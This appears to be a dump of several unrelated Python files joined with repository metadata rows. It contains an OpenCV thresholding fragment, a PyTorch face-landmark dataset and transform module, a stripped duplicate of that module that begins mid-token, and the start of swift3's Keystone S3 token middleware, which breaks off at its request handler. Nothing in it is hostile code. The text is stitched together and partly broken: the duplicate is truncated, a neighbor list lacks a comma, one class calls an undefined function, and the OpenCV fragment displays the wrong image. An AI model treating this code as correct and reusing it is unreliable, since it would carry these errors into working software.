thresh = cv2.adaptiveThreshold(image, 255, cv2.ADAPTIVE_THRESH_MEAN_C,
cv2.THRESH_BINARY, 3, 5)
cv2.imshow("Adaptive Mean Thresholding", thresh)
cv2.waitKey(0)
_, th2 = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Otsu's Thresholding", thresh)
cv2.waitKey(0)
blur = cv2.GaussianBlur(image, (5,5), 0)
_, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
cv2.imshow("Guassian Otsu's Thresholding", thresh)
cv2.waitKey(0)
cv2.destroyAllWindows() | true | true |
f726110264ab39655e21d921ad0fde90f93c841c | 15,517 | py | Python | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | 2 | 2018-03-22T01:46:49.000Z | 2020-11-06T06:58:01.000Z | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | null | null | null | face_alignment/FaceLandmarksDataset.py | Efreeto/face-alignment | d496866ac3d66c8353ba3e0305f16ac8a2ccc017 | [
"BSD-3-Clause"
] | null | null | null | import torch
from torch.utils.data import Dataset
from skimage import io, color, transform
import torchvision
import os, glob
import numpy as np
import random
from scipy import ndimage
from PIL import Image
import torch.nn.functional as F
from . import utils
######################################################################
# Transforms
# ----------
#
# One issue we can see from the above is that the samples are not of the
# same size. Most neural networks expect the images of a fixed size.
# Therefore, we will need to write some prepocessing code.
# Let's create three transforms:
#
# - ``Rescale``: to scale the image
# - ``RandomCrop``: to crop from image randomly. This is data
# augmentation.
# - ``ToTensor``: to convert the numpy images to torch images (we need to
# swap axes).
#
# We will write them as callable classes instead of simple functions so
# that parameters of the transform need not be passed everytime it's
# called. For this, we just need to implement ``__call__`` method and
# if required, ``__init__`` method. We can then use a transform like this:
#
# ::
#
# tsfm = Transform(params)
# transformed_sample = tsfm(sample)
#
# Observe below how these transforms had to be applied both on the image and
# landmarks.
#
class Rescale(object):
"""Rescale the image in a sample to a given size.
Args:
output_size (tuple or tuple): Desired output size. If tuple, output is
matched to output_size. If int, smaller of image edges is matched
to output_size keeping aspect ratio the same.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
if isinstance(self.output_size, int):
if h > w:
new_h, new_w = self.output_size * h / w, self.output_size
else:
new_h, new_w = self.output_size, self.output_size * w / h
else:
new_h, new_w = self.output_size
new_h, new_w = int(new_h), int(new_w)
img = transform.resize(image, (new_h, new_w))
# h and w are swapped for landmarks because for images,
# x and y axes are axis 1 and 0 respectively
landmarks = landmarks * [new_w / w, new_h / h]
img = img.astype('float32')
landmarks = landmarks.astype('float32')
return {'image': img, 'landmarks': landmarks}
class RandomHorizFlip(object):
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
if random.random() < 0.5:
image = np.fliplr(image).copy()
landmarks = landmarks.transpose()
landmarks[0] = image.shape[1] - landmarks[0]
landmarks = landmarks.transpose()
landmarks = utils.shuffle_lr(landmarks)
return {'image': image, 'landmarks': landmarks}
__imagenet_stats = {'mean': [0.485, 0.456, 0.406],
'std': [0.229, 0.224, 0.225]}
imagenet_pca = {
'eigval': torch.Tensor([0.2175, 0.0188, 0.0045]),
'eigvec': torch.Tensor([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
class Lighting(object):
"""Lighting noise(AlexNet - style PCA - based noise)"""
def __init__(self, alphastd=0.1, eigval=imagenet_pca['eigval'], eigvec=imagenet_pca['eigvec']):
self.alphastd = alphastd
self.eigval = eigval
self.eigvec = eigvec
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
if self.alphastd == 0:
return image
alpha = image.new().resize_(3).normal_(0, self.alphastd)
rgb = self.eigvec.type_as(image).clone()\
.mul(alpha.view(1, 3).expand(3, 3))\
.mul(self.eigval.view(1, 3).expand(3, 3))\
.sum(1).squeeze()
return {'image': image.add(rgb.view(3, 1, 1).expand_as(image)), 'landmarks': landmarks}
class FaceColorJitter(object):
def __init__(self, brightness=0.4, contrast=0.4, saturation=0.4):
self.color_jitter = torchvision.transforms.ColorJitter(brightness, contrast, saturation)
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks'].copy()
to_pil = torchvision.transforms.ToPILImage()
img = to_pil(image)
img = self.color_jitter(img)
to_tensor = torchvision.transforms.ToTensor()
image = to_tensor(img).numpy().transpose(1,2,0)
return {'image': image, 'landmarks': landmarks}
class RandomRotation(object):
def __init__(self, maximum_angle=50., minimum_angle=5.):
self.maximum_angle = maximum_angle - minimum_angle
self.minimum_angle = minimum_angle
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
rotation_angle = (random.random() - 0.5) * 2 * self.maximum_angle
if rotation_angle > 0:
rotation_angle += self.minimum_angle
else:
rotation_angle -= self.minimum_angle
manual_theta = utils.transformation_matrix(-rotation_angle)
manual_theta_inv = utils.transformation_matrix(rotation_angle)
image_rot = ndimage.rotate(image, rotation_angle, reshape=True)
origin_org = ((image.shape[1] / 2.0, image.shape[0] / 2.0))
origin_rot = ((image_rot.shape[1] / 2.0, image_rot.shape[0] / 2.0))
landmarks_rot = landmarks - origin_org
landmarks_rot = np.asarray(np.dot(landmarks_rot, manual_theta_inv)[:, :2])
landmarks_rot = landmarks_rot + origin_rot
sample['image_rot'] = image_rot
sample['landmarks_rot'] = landmarks_rot
sample['theta'] = manual_theta
sample['angle'] = rotation_angle
return sample
class LandmarkCrop(object):
def __init__(self, resolution):
self.resolution = resolution
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
# landmarks = landmarks - (bbox[0], bbox[1])
sample['image'] = image
sample['landmarks'] = landmarks
if 'image_rot' in sample: # if RandomRotation, crop around the rotated image
image, landmarks = sample['image_rot'], sample['landmarks_rot']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
# landmarks = landmarks - (bbox[0], bbox[1])
sample['image_rot'] = image
sample['landmarks_rot'] = landmarks
return sample
class CreateHeatmaps(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
if 'image_rot' in sample: # if RandomRotation, crop around the rotated image
landmarks = sample['landmarks_rot']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps_rot'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
return sample
class CreateHeatmaps2(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
if self.n_features==68:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16], [19], [18,20], [19,21], [20,22], [21],[24],[23,25],
[24,26],[25,27],[26],[29],[28,30],[29,31],[30,34],[33],
[32,34],[33,35],[34,36],[35],[],[37,39],[38,40],[],[40,42],
[37,41],[],[43,45],[44,46],[],[46,48],[43,47],[],[49,51],
[50,52],[51,53],[52,54],[53,55],[],[55,57],[56,58],[57,59],
[58,60],[59,49],[49],[61,63],[62,64],[63,65],[55],[65,67],
[66,68],[61,67]]
elif self.n_features==108:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16,18],[17,19],[18,20],[19,21],[20,22],[21,23],[22,24],
[23,25],[24,26],[25,27],[26,28],[27,29],[28,30],[29,31],
[30,32],[31,33],[32],[],[34,36],[35,37],[36,38],[], [39,41],
[40,42],[41,43], [],[45],[44,46], [45,47], [46], [49],[48,50],
[],[50,52],[51],[],[53,55],[54,56],[],[56,58], [],[],[59,61],
[60,62],[],[62,64],[],[],[65,67],[66,68],[],[],[69,71],[70,72],[]
[54,55],[58,57],[],[60,61],[63,64],[],[81],[82],[79,83],[80,84],
[81,85],[82,86],[83,87],[84,88],[48],[52],[],[89,91],[90,92],
[91,93],[92,94],[93,95],[],[95,97],[96,98],[97,99],[98,100],[89,99],
[],[101,103],[102,104],[103,105],[],[105,107],[106,108],[101,107]]
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = center_scale_from_landmark(landmarks)
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
foo = np.zeros((self.output_size, self.output_size))
for i in range(self.n_features):
neighbors = self.get_neighbors(i)
num_neighbors = len(neighbors)
if num_neighbors == 0:
heatmap[i] = utils.draw_gaussian(heatmap[i], utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
else:
if num_neighbors == 2:
points = np.zeros((3,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
points[2] = utils.transform(landmarks[neighbors[1]-1], center, scale, self.output_size).numpy()
else:
points = np.zeros((2,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
heatmap[i] = utils.draw_gaussian2(heatmap[i], points, 1)
# foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian2(foo, points, 1)
"""
from PIL import Image
im = Image.fromarray(foo*255)
im.show()
"""
heatmaps = torch.from_numpy(heatmap).view(1, self.n_features, self.output_size, self.output_size).float()
return {'image': sample['image'], 'landmarks': heatmaps}
def get_neighbors(self, landmark):
return self.neigbor_list[landmark]
class RandomCrop(object):
"""Crop randomly the image in a sample.
Args:
output_size (tuple or int): Desired output size. If int, square crop
is made.
"""
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
image = image[top: top + new_h,
left: left + new_w]
landmarks = landmarks - [left, top]
return {'image': image, 'landmarks': landmarks}
class ToTensor(object):
"""Convert ndarrays in sample to Tensors."""
def __call__(self, sample):
for key in sample:
if key in ['image', 'image_rot']:
sample[key] = torchvision.transforms.ToTensor()(sample[key])
elif key in ['filename', 'angle', 'heatmaps', 'heatmaps_rot']:
continue
else:
sample[key] = torch.from_numpy(sample[key]).float()
return sample
class FaceLandmarksDataset(Dataset):
"""Face Landmarks dataset."""
def __init__(self, path, type=1, transforms=None):
"""
Args:
path (string): Directory with all the images and landmarks.
transforms (callable, optional): Optional transform to be applied
on a sample.
"""
self.type = type
self.transforms = transforms
image_exts = ('*.jpg', '*.png')
self.images_list = []
for ext in image_exts:
self.images_list.extend(sorted(glob.glob(os.path.join(path, ext))))
assert self.images_list, "path does not contain images"
def __len__(self):
return len(self.images_list)
def __getitem__(self, idx):
image = io.imread(self.images_list[idx])
image = color.grey2rgb(image) # For some gray scale images
filename = self.images_list[idx]
basename = os.path.splitext(filename)[0]
if self.type == 1: # 300W, lfpw
landmarks = np.loadtxt(basename + '.pts', skiprows=3, comments='}')
elif self.type == 2: # land110
landmarks = np.loadtxt(basename + '.land', skiprows=1)
# landmarks = np.vstack((landmarks[0:32:2], landmarks[32:64], landmarks[88:108]))
elif self.type == 3: # FEI
landmarks = np.ones((68,2))
elif self.type == 4: # 8W
landmarks = np.loadtxt(basename + '.pts')
sample = {'image': image, 'landmarks': landmarks, 'filename': filename}
if self.transforms:
sample = self.transforms(sample)
return sample
| 40.620419 | 128 | 0.577431 | import torch
from torch.utils.data import Dataset
from skimage import io, color, transform
import torchvision
import os, glob
import numpy as np
import random
from scipy import ndimage
from PIL import Image
import torch.nn.functional as F
from . import utils
rn image
alpha = image.new().resize_(3).normal_(0, self.alphastd)
rgb = self.eigvec.type_as(image).clone()\
.mul(alpha.view(1, 3).expand(3, 3))\
.mul(self.eigval.view(1, 3).expand(3, 3))\
.sum(1).squeeze()
return {'image': image.add(rgb.view(3, 1, 1).expand_as(image)), 'landmarks': landmarks}
class FaceColorJitter(object):
def __init__(self, brightness=0.4, contrast=0.4, saturation=0.4):
self.color_jitter = torchvision.transforms.ColorJitter(brightness, contrast, saturation)
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks'].copy()
to_pil = torchvision.transforms.ToPILImage()
img = to_pil(image)
img = self.color_jitter(img)
to_tensor = torchvision.transforms.ToTensor()
image = to_tensor(img).numpy().transpose(1,2,0)
return {'image': image, 'landmarks': landmarks}
class RandomRotation(object):
def __init__(self, maximum_angle=50., minimum_angle=5.):
self.maximum_angle = maximum_angle - minimum_angle
self.minimum_angle = minimum_angle
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
rotation_angle = (random.random() - 0.5) * 2 * self.maximum_angle
if rotation_angle > 0:
rotation_angle += self.minimum_angle
else:
rotation_angle -= self.minimum_angle
manual_theta = utils.transformation_matrix(-rotation_angle)
manual_theta_inv = utils.transformation_matrix(rotation_angle)
image_rot = ndimage.rotate(image, rotation_angle, reshape=True)
origin_org = ((image.shape[1] / 2.0, image.shape[0] / 2.0))
origin_rot = ((image_rot.shape[1] / 2.0, image_rot.shape[0] / 2.0))
landmarks_rot = landmarks - origin_org
landmarks_rot = np.asarray(np.dot(landmarks_rot, manual_theta_inv)[:, :2])
landmarks_rot = landmarks_rot + origin_rot
sample['image_rot'] = image_rot
sample['landmarks_rot'] = landmarks_rot
sample['theta'] = manual_theta
sample['angle'] = rotation_angle
return sample
class LandmarkCrop(object):
def __init__(self, resolution):
self.resolution = resolution
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
sample['image'] = image
sample['landmarks'] = landmarks
if 'image_rot' in sample:
image, landmarks = sample['image_rot'], sample['landmarks_rot']
bbox = utils.bounding_box(landmarks)
center, scale = utils.center_scale_from_bbox(bbox)
image = utils.crop(image, center, scale, self.resolution)
sample['image_rot'] = image
sample['landmarks_rot'] = landmarks
return sample
class CreateHeatmaps(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
if 'image_rot' in sample:
landmarks = sample['landmarks_rot']
center, scale = utils.center_scale_from_bbox(utils.bounding_box(landmarks))
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
for i in range(self.n_features):
new_pts = utils.transform(landmarks[i], center, scale, self.output_size)
heatmap[i] = utils.draw_gaussian(heatmap[i], new_pts, 1)
sample['heatmaps_rot'] = torch.from_numpy(heatmap).view(self.n_features, self.output_size, self.output_size).float()
return sample
class CreateHeatmaps2(object):
def __init__(self, output_size=64, n_features=68):
self.output_size = output_size
self.n_features = n_features
if self.n_features==68:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16], [19], [18,20], [19,21], [20,22], [21],[24],[23,25],
[24,26],[25,27],[26],[29],[28,30],[29,31],[30,34],[33],
[32,34],[33,35],[34,36],[35],[],[37,39],[38,40],[],[40,42],
[37,41],[],[43,45],[44,46],[],[46,48],[43,47],[],[49,51],
[50,52],[51,53],[52,54],[53,55],[],[55,57],[56,58],[57,59],
[58,60],[59,49],[49],[61,63],[62,64],[63,65],[55],[65,67],
[66,68],[61,67]]
elif self.n_features==108:
self.neigbor_list = [[2],[1,3],[2,4],[3,5],[4,6],[5,7],[6,8],[7,9],[8,10],
[9,11],[10,12],[11,13],[12,14],[13,15],[14,16],[15,17],
[16,18],[17,19],[18,20],[19,21],[20,22],[21,23],[22,24],
[23,25],[24,26],[25,27],[26,28],[27,29],[28,30],[29,31],
[30,32],[31,33],[32],[],[34,36],[35,37],[36,38],[], [39,41],
[40,42],[41,43], [],[45],[44,46], [45,47], [46], [49],[48,50],
[],[50,52],[51],[],[53,55],[54,56],[],[56,58], [],[],[59,61],
[60,62],[],[62,64],[],[],[65,67],[66,68],[],[],[69,71],[70,72],[]
[54,55],[58,57],[],[60,61],[63,64],[],[81],[82],[79,83],[80,84],
[81,85],[82,86],[83,87],[84,88],[48],[52],[],[89,91],[90,92],
[91,93],[92,94],[93,95],[],[95,97],[96,98],[97,99],[98,100],[89,99],
[],[101,103],[102,104],[103,105],[],[105,107],[106,108],[101,107]]
def __call__(self, sample):
landmarks = sample['landmarks']
center, scale = center_scale_from_landmark(landmarks)
heatmap = np.zeros((self.n_features, self.output_size, self.output_size))
foo = np.zeros((self.output_size, self.output_size))
for i in range(self.n_features):
neighbors = self.get_neighbors(i)
num_neighbors = len(neighbors)
if num_neighbors == 0:
heatmap[i] = utils.draw_gaussian(heatmap[i], utils.transform(landmarks[i], center, scale, self.output_size), 1)
foo = utils.draw_gaussian(foo, utils.transform(landmarks[i], center, scale, self.output_size), 1)
else:
if num_neighbors == 2:
points = np.zeros((3,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
points[2] = utils.transform(landmarks[neighbors[1]-1], center, scale, self.output_size).numpy()
else:
points = np.zeros((2,2))
points[0] = utils.transform(landmarks[neighbors[0]-1], center, scale, self.output_size).numpy()
points[1] = utils.transform(landmarks[i], center, scale, self.output_size).numpy()
heatmap[i] = utils.draw_gaussian2(heatmap[i], points, 1)
foo = utils.draw_gaussian2(foo, points, 1)
heatmaps = torch.from_numpy(heatmap).view(1, self.n_features, self.output_size, self.output_size).float()
return {'image': sample['image'], 'landmarks': heatmaps}
def get_neighbors(self, landmark):
return self.neigbor_list[landmark]
class RandomCrop(object):
def __init__(self, output_size):
assert isinstance(output_size, (int, tuple))
if isinstance(output_size, int):
self.output_size = (output_size, output_size)
else:
assert len(output_size) == 2
self.output_size = output_size
def __call__(self, sample):
image, landmarks = sample['image'], sample['landmarks']
h, w = image.shape[:2]
new_h, new_w = self.output_size
top = np.random.randint(0, h - new_h)
left = np.random.randint(0, w - new_w)
image = image[top: top + new_h,
left: left + new_w]
landmarks = landmarks - [left, top]
return {'image': image, 'landmarks': landmarks}
class ToTensor(object):
def __call__(self, sample):
for key in sample:
if key in ['image', 'image_rot']:
sample[key] = torchvision.transforms.ToTensor()(sample[key])
elif key in ['filename', 'angle', 'heatmaps', 'heatmaps_rot']:
continue
else:
sample[key] = torch.from_numpy(sample[key]).float()
return sample
class FaceLandmarksDataset(Dataset):
def __init__(self, path, type=1, transforms=None):
self.type = type
self.transforms = transforms
image_exts = ('*.jpg', '*.png')
self.images_list = []
for ext in image_exts:
self.images_list.extend(sorted(glob.glob(os.path.join(path, ext))))
assert self.images_list, "path does not contain images"
def __len__(self):
return len(self.images_list)
def __getitem__(self, idx):
image = io.imread(self.images_list[idx])
image = color.grey2rgb(image)
filename = self.images_list[idx]
basename = os.path.splitext(filename)[0]
if self.type == 1:
landmarks = np.loadtxt(basename + '.pts', skiprows=3, comments='}')
elif self.type == 2:
landmarks = np.loadtxt(basename + '.land', skiprows=1)
elif self.type == 3:
landmarks = np.ones((68,2))
elif self.type == 4:
landmarks = np.loadtxt(basename + '.pts')
sample = {'image': image, 'landmarks': landmarks, 'filename': filename}
if self.transforms:
sample = self.transforms(sample)
return sample
| true | true |
f726125525cfe331ad2b253c9640d4eea089106b | 19,878 | py | Python | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 10 | 2017-04-21T13:56:48.000Z | 2022-03-29T17:15:40.000Z | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 12 | 2017-05-04T16:23:35.000Z | 2021-09-08T16:42:58.000Z | swift3/s3_token_middleware.py | AymericDu/swift3 | a64be4ed9c6657fc5471e87e08e6c7465b7bd444 | [
"Apache-2.0"
] | 10 | 2017-05-10T14:00:42.000Z | 2019-10-28T13:24:57.000Z | # Copyright 2012 OpenStack Foundation
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2011,2012 Akira YOSHIYAMA <akirayoshiyama@gmail.com>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# This source code is based ./auth_token.py and ./ec2_token.py.
# See them for their copyright.
"""
S3 Token Middleware
This WSGI component:
* Gets a request from the swift3 middleware with an S3 Authorization
access key.
* Validates s3 token in Keystone.
* Transforms the account name to AUTH_%(tenant_name).
* Optionally can retrieve and cache secret from keystone
to validate signature locally
"""
import base64
import json
from keystoneclient.v3 import client as keystone_client
from keystoneauth1 import session as keystone_session
from keystoneauth1 import loading as keystone_loading
import requests
import httplib
import six
from six.moves import urllib
from swift.common.swob import Request, HTTPBadRequest, HTTPUnauthorized, \
HTTPException, HTTPServiceUnavailable
from swift.common.utils import config_true_value, split_path, get_logger, \
cache_from_env
from swift.common.wsgi import ConfigFileError
from swift3.utils import is_valid_ipv6
PROTOCOL_NAME = 'S3 Token Authentication'
# Headers to purge if they came from (or may have come from) the client
KEYSTONE_AUTH_HEADERS = (
'X-Identity-Status', 'X-Service-Identity-Status',
'X-Domain-Id', 'X-Service-Domain-Id',
'X-Domain-Name', 'X-Service-Domain-Name',
'X-Project-Id', 'X-Service-Project-Id',
'X-Project-Name', 'X-Service-Project-Name',
'X-Project-Domain-Id', 'X-Service-Project-Domain-Id',
'X-Project-Domain-Name', 'X-Service-Project-Domain-Name',
'X-User-Id', 'X-Service-User-Id',
'X-User-Name', 'X-Service-User-Name',
'X-User-Domain-Id', 'X-Service-User-Domain-Id',
'X-User-Domain-Name', 'X-Service-User-Domain-Name',
'X-Roles', 'X-Service-Roles',
'X-Is-Admin-Project',
'X-Service-Catalog',
# Deprecated headers, too...
'X-Tenant-Id',
'X-Tenant-Name',
'X-Tenant',
'X-User',
'X-Role',
)
def parse_v2_response(token):
access_info = token['access']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in access_info['user']['roles']),
'X-User-Id': access_info['user']['id'],
'X-User-Name': access_info['user']['name'],
'X-Tenant-Id': access_info['token']['tenant']['id'],
'X-Tenant-Name': access_info['token']['tenant']['name'],
'X-Project-Id': access_info['token']['tenant']['id'],
'X-Project-Name': access_info['token']['tenant']['name'],
}
return (
headers,
access_info['token'].get('id'),
access_info['token']['tenant'])
def parse_v3_response(token):
token = token['token']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in token['roles']),
'X-User-Id': token['user']['id'],
'X-User-Name': token['user']['name'],
'X-User-Domain-Id': token['user']['domain']['id'],
'X-User-Domain-Name': token['user']['domain']['name'],
'X-Tenant-Id': token['project']['id'],
'X-Tenant-Name': token['project']['name'],
'X-Project-Id': token['project']['id'],
'X-Project-Name': token['project']['name'],
'X-Project-Domain-Id': token['project']['domain']['id'],
'X-Project-Domain-Name': token['project']['domain']['name'],
}
return headers, None, token['project']
class S3Token(object):
"""Middleware that handles S3 authentication."""
def __init__(self, app, conf):
"""Common initialization code."""
self._app = app
self._logger = get_logger(
conf, log_route=conf.get('log_name', 's3token'))
self._logger.debug('Starting the %s component', PROTOCOL_NAME)
self._timeout = float(conf.get('http_timeout', '10.0'))
if not (0 < self._timeout <= 60):
raise ValueError('http_timeout must be between 0 and 60 seconds')
self._reseller_prefix = conf.get('reseller_prefix', 'AUTH_')
self._delay_auth_decision = config_true_value(
conf.get('delay_auth_decision'))
# where to find the auth service (we use this to validate tokens)
self._request_uri = conf.get('auth_uri')
if not self._request_uri:
self._logger.warning(
"Use of the auth_host, auth_port, and auth_protocol "
"configuration options was deprecated in the Newton release "
"in favor of auth_uri. These options may be removed in a "
"future release.")
auth_host = conf.get('auth_host')
if not auth_host:
raise ConfigFileError('Either auth_uri or auth_host required')
elif is_valid_ipv6(auth_host):
# Note(timburke) it is an IPv6 address, so it needs to be
# wrapped with '[]' to generate a valid IPv6 URL, based on
# http://www.ietf.org/rfc/rfc2732.txt
auth_host = '[%s]' % auth_host
auth_port = int(conf.get('auth_port', 35357))
auth_protocol = conf.get('auth_protocol', 'https')
self._request_uri = '%s://%s:%s' % (auth_protocol, auth_host,
auth_port)
self._request_uri = self._request_uri.rstrip('/')
parsed = urllib.parse.urlsplit(self._request_uri)
if not parsed.scheme or not parsed.hostname:
raise ConfigFileError(
'Invalid auth_uri; must include scheme and host')
if parsed.scheme not in ('http', 'https'):
raise ConfigFileError(
'Invalid auth_uri; scheme must be http or https')
if parsed.query or parsed.fragment or '@' in parsed.netloc:
raise ConfigFileError('Invalid auth_uri; must not include '
'username, query, or fragment')
self._request_uri += '/v%s/s3tokens' % conf.get('auth_version', '2.0')
self._max_attempts = 1 + int(conf.get('max_retries', 1))
# SSL
insecure = config_true_value(conf.get('insecure'))
cert_file = conf.get('certfile')
key_file = conf.get('keyfile')
if insecure:
self._verify = False
elif cert_file and key_file:
self._verify = (cert_file, key_file)
elif cert_file:
self._verify = cert_file
else:
self._verify = None
self.session = requests.Session()
self._secret_cache_duration = int(conf.get('secret_cache_duration', 0))
if self._secret_cache_duration > 0:
try:
auth_plugin = keystone_loading.get_plugin_loader(
conf.get('auth_type'))
available_auth_options = auth_plugin.get_options()
auth_options = {}
for option in available_auth_options:
name = option.name.replace('-', '_')
value = conf.get(name)
if value:
auth_options[name] = value
auth = auth_plugin.load_from_options(**auth_options)
session = keystone_session.Session(auth=auth)
self.keystoneclient = keystone_client.Client(session=session)
self._logger.info("Caching s3tokens for %s seconds",
self._secret_cache_duration)
except Exception:
self._logger.warning("Unable to load keystone auth_plugin. "
"Secret caching will be unavailable.",
exc_info=True)
self.keystoneclient = None
self._secret_cache_duration = 0
def _deny_request(self, code):
error_cls, message = {
'AccessDenied': (HTTPUnauthorized, 'Access denied'),
'InvalidURI': (HTTPBadRequest,
'Could not parse the specified URI'),
'ServiceUnavailable': (HTTPServiceUnavailable,
'Service unavailable'),
}[code]
resp = error_cls(content_type='text/xml')
error_msg = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<Error>\r\n <Code>%s</Code>\r\n '
'<Message>%s</Message>\r\n</Error>\r\n' %
(code, message))
if six.PY3:
error_msg = error_msg.encode()
resp.body = error_msg
return resp
def _json_request(self, creds_json, tx_id):
headers = {
'Content-Type': 'application/json',
'X-Trans-Id': tx_id
}
for attempt in range(self._max_attempts):
try:
response = self.session.post(
self._request_uri, headers=headers,
data=creds_json, verify=self._verify,
timeout=self._timeout)
except requests.exceptions.Timeout as e:
self._logger.info('HTTP timeout: %s', e)
raise self._deny_request('ServiceUnavailable')
except httplib.BadStatusLine as e:
# See https://github.com/requests/requests/issues/2364
self._logger.warning('HTTP request raised %s', e)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
except requests.exceptions.RequestException as e:
self._logger.warning('HTTP connection exception: %s', e)
# Sometimes, we don't get httplib.BadStatusLine,
# but a RequestException with a nested ProtocolError
# with BadStatusLine as message.
if 'BadStatusLine' in str(e) and \
attempt + 1 < self._max_attempts:
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
raise self._deny_request('InvalidURI')
if response.status_code >= 500:
self._logger.warning(
'Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
elif response.status_code < 200 or response.status_code >= 300:
self._logger.debug('Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
raise self._deny_request('AccessDenied')
break
return response
def __call__(self, environ, start_response):
